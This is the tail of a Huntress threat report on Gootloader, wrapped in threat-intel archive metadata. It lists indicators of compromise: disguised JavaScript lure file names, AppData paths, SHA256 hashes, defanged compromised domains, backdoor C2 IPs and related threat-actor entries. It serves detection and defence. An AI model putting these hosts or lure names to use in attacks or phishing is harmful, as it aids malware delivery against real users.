EMC\r\nControlCenter.js\r\nPath:\r\nC:\\Users\\username\\AppData\\Roaming\\Nuance\\\r\nSHA256:\r\nb9a61652dffd2ab3ec3b7e95829759fc43665c27e9642d4b2d4d2f7287254034\r\nDomains:\r\nhxxps://filmcrewnepal.com/\r\nhxxps://yoga-penzberg.de/\r\nhxxps://sugarbeecrafts.com/\r\nhxxps://www.worldwealthbuilders.com/\r\nhxxps://lepolice.com/\r\nhxxps://www.lovestu.com/\r\nGootloader’s secondary JavaScript file:\r\nMitigation Strategies.js\r\nhttps://www.huntress.com/blog/gootloader-threat-detection-woff2-obfuscation\r\nPage 19 of 23\n\nhxxps://bluehamham.com/\r\nhxxps://vps3nter.ir/\r\nhxxps://whiskymuseum.at/\r\nhxxps://latimp.eu/\r\nPath: \r\nC:\\Users\\username\\AppData\\Roaming\\PFU\\\r\nSHA256:\r\n2f056ce0657542da3e7e43fb815a8973c354624043f19ef134dff271db1741b3\r\nDomains:\r\nhxxps://solidegypt.net/\r\nhxxps://wessper.com/\r\nhxxps://www.pathfindertravels.se/tickets/\r\nhxxps://www.smithcoinc.biz/\r\nhxxps://kollabmi.se/\r\nhxxps://xxxmorritas.com/\r\nhxxps://onsk.dk/\r\nhxxps://villasaze.ir/\r\nhxxps://blossomthemesdemo.com/\r\nhxxps://headedforspace.com/\r\nGootloader’s secondary JavaScript file: Adaptive\r\nAlgorithms.js\r\nSHA256:\r\nc2326db8acae0cf9c5fc734e01d6f6c1cd78473b27044955c5761ec7fd479964\r\nGootloader’s initial JavaScript file:\r\nDomestic_Partnership_Agreement_Template.js\r\nSHA256:\r\nad88076fd75d80e963d07f03d7ae35d4e55bd49634baf92743eece19ec901e94\r\nGootloader’s initial JavaScript file:\r\nUnmarried_Couples_Rights_Checklist.js\r\nPath: C:\\Users\\username\\AppData\\Local\\Oardwior\\\r\nSHA256:\r\ncf44aa11a17b3dad61cae715f4ea27c0cbf80732a1a7a1c530a5c9d3d183482a\r\nTextShell containing Supper Backdoor:\r\nDisconnect Package Oardwior.ijp\r\nhttps://www.huntress.com/blog/gootloader-threat-detection-woff2-obfuscation\r\nPage 20 of 23\n\nC2s:\r\n178.32.224[.]219\r\n37.59.205[.]2\r\n193.104.58[.]64\r\nSHA256:\r\nc2b9782c55f75bb1797cb4fbae0290b44d0fcad51bf4f2c11c52ebbe3526d2ac\r\nDomains:\r\nhxxps://spirits-station.fr/\r\nhxxps://www.us.registration.fcaministers.com/\r\nhxxps://motoz.com.au/\r\nhxxps://routinelynomadic.com/\r\nhxxps://www.wagenbaugrabs.ch/\r\nhxxps://studentspoint.org/\r\nhxxps://cortinaspraga.com/\r\nhxxps://dailykhabrain.com.pk/\r\nhxxps://myanimals.com/\r\nhxxps://www2.pelisyseries.net/\r\nGootloader’s initial JavaScript file:\r\nMissouri_Utility_Easement_Guide_2023.js\r\nPath:\r\nC:\\Users\\username\\AppData\\Roaming\\myHUD\r\nSHA256:\r\n7557d5fed880ee1e292aba464ffdc12021f9acbe0ee3a2313519ecd7f94ec5c4\r\nDomains:\r\nhxxps://www.claritycontentservices.com/wp/\r\nhxxps://patriotillumination.com/\r\nhxxps://michaelcheney.com/\r\nhxxps://allreleases.ru/\r\nhxxps://cloudy.pk/\r\nhxxps://eliskavaea.cz/\r\nGootloader’s secondary JavaScript file: Certified\r\nTrainer.js\r\nhttps://www.huntress.com/blog/gootloader-threat-detection-woff2-obfuscation\r\nPage 21 of 23\n\nhxxps://r34porn.net/\r\nhxxps://www.wagenbaugrabs.ch/\r\nhxxps://leadoo.com/\r\nhxxps://ostmarketing.com/\r\nPath:\r\nC:\\Users\\username\\AppData\\Roaming\\Canon U.S.A., Inc\r\nSHA256:\r\n5ec9e926d4fb4237cf297d0d920cf0e9a5409f0226ee555bd8c89b97a659f4b0\r\nDomains:\r\nhxxps://egyptelite.com/\r\nhxxps://restaurantchezhenri.ca/\r\nhxxps://www1.zonewebmaster.eu/news/\r\nhxxps://campfosterymca.com/\r\nhxxps://idmpakistan.pk/\r\nhxxps://themasterscraft.com/\r\nhxxps://unica.md/\r\nhxxps://cargoboard.de/\r\nhxxps://www.supremesovietoflove.com/wp/\r\nhxxps://buildacampervan.com/\r\nGootloader’s secondary JavaScript file:\r\nEnvironmental Economics.js\r\nSHA256:\r\n87cbe9a5e9da0dba04dbd8046b90dbd8ee531e99fd6b351eae1ae5df5aa67439\r\nDomains:\r\nhxxps://www.minklinkaps.com/\r\nhxxps://aradax.ir/\r\nhxxps://medicit-y.ch/\r\nhxxps://redronic.com/\r\nhxxps://www.ferienhausdehaanmieten.de/\r\nhxxps://gravityforms.ir/\r\nhxxps://apprater.net/\r\nGootloader’s initial JavaScript file:\r\nHOA_Committee_Meeting_Agenda_Template.js\r\nhttps://www.huntress.com/blog/gootloader-threat-detection-woff2-obfuscation\r\nPage 22 of 23\n\nhxxps://fotbalovavidea.cz/\r\nhxxps://usma.ru/\r\nhxxps://thetripschool.com/\r\nAcknowledgments \r\nHuge thanks to @DFIRReport for their generous support, analysis, and contribution to this blog.\r\nSource: https://www.huntress.com/blog/gootloader-threat-detection-woff2-obfuscation\r\nhttps://www.huntress.com/blog/gootloader-threat-detection-woff2-obfuscation\r\nPage 23 of 23", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://www.huntress.com/blog/gootloader-threat-detection-woff2-obfuscation" ], "report_names": [ "gootloader-threat-detection-woff2-obfuscation" ], "threat_actors": [ { "id": "faa4a29b-254a-45bd-b412-9a1cbddbd5e3", "created_at": "2022-10-25T16:07:23.80111Z", "updated_at": "2026-04-10T02:00:04.753677Z", "deleted_at": null, "main_name": "LookBack", "aliases": [ "FlowingFrog", "LookBack", "LookingFrog", "TA410", "Witchetty" ], "source_name": "ETDA:LookBack", "tools": [ "FlowCloud", "GUP Proxy Tool", "SodomMain", "SodomMain RAT", "SodomNormal" ], "source_id": "ETDA", "reports": null }, { "id": "a6814184-2133-4520-b7b3-63e6b7be2f64", "created_at": "2025-08-07T02:03:25.019385Z", "updated_at": "2026-04-10T02:00:03.859468Z", "deleted_at": null, "main_name": "GOLD VICTOR", "aliases": [ "DEV-0832 ", "STAC5279 ", "Vanilla Tempest ", "Vice Society", "Vice Spider " ], "source_name": "Secureworks:GOLD VICTOR", "tools": [ "Advanced IP Scanner", "Advanced Port Scanner", "HelloKitty ransomware", "INC ransomware", "MEGAsync", "Neshta", "PAExec", "PolyVice ransomware", "PortStarter", "PsExec", "QuantumLocker ransomware", "Rhysida ransomware", "Supper", "SystemBC", "Zeppelin ransomware" ], "source_id": "Secureworks", "reports": null }, { "id": "2a8f551d-206b-48f0-8a03-ed34b29ca8b6", "created_at": "2024-10-04T02:00:04.748248Z", "updated_at": "2026-04-10T02:00:03.711864Z", "deleted_at": null, "main_name": "Storm-0494", "aliases": [], "source_name": "MISPGALAXY:Storm-0494", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "84aa9dbe-e992-4dce-9d80-af3b2de058c0", "created_at": "2024-02-02T02:00:04.041676Z", "updated_at": "2026-04-10T02:00:03.537352Z", "deleted_at": null, "main_name": "Vanilla Tempest", "aliases": [ "DEV-0832", "Vice Society" ], "source_name": "MISPGALAXY:Vanilla Tempest", "tools": [], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1775434936, "ts_updated_at": 1775792058, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/6d02007f968ea3c1ab3da669fb501bb7645f835a.pdf", "text": "https://archive.orkl.eu/6d02007f968ea3c1ab3da669fb501bb7645f835a.txt", "img": "https://archive.orkl.eu/6d02007f968ea3c1ab3da669fb501bb7645f835a.jpg" } }